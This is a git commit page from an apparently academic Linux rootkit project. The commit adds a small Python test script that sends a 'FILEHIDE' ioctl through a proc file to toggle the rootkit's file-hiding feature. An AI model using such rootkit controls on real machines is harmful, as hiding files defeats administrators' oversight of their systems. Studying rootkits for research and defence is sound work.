adds filehide test script - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit c0f6c3f9d116a5e13d53b219404f856d663cea4b
parent 79eae0f0a870cee54edc4949948d22d7ea3bd723
Author: deurzen <m.deurzen@tum.de>
Date:   Sat, 21 Nov 2020 15:30:11 +0100

adds filehide test script

Diffstat:
A toggle_filehide.py  | 25 +++++++++++++++++++++++++

1 file changed, 25 insertions(+), 0 deletions(-)
diff --git a/toggle_filehide.py b/toggle_filehide.py
@@ -0,0 +1,25 @@
+#!/usr/bin/env python3
+
+import fcntl
+import os
+import unittest
+import argparse
+import sys
+
+IOCTL_FILEHIDE = 0x80084001
+
+proc_fd = None
+
+class TestIOCTLPing(unittest.TestCase):
+    def test_filehide(self):
+        arg = b"FILEHIDE"
+        res = fcntl.ioctl(proc_fd, IOCTL_FILEHIDE, arg)
+        self.assertEqual(res, b"FILEHIDE")
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument("proc_file")
+    args, remaining = parser.parse_known_args()
+    proc_fd = os.open(args.proc_file, os.O_RDWR)
+
+    unittest.main(argv=[sys.argv[0]] + remaining)

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs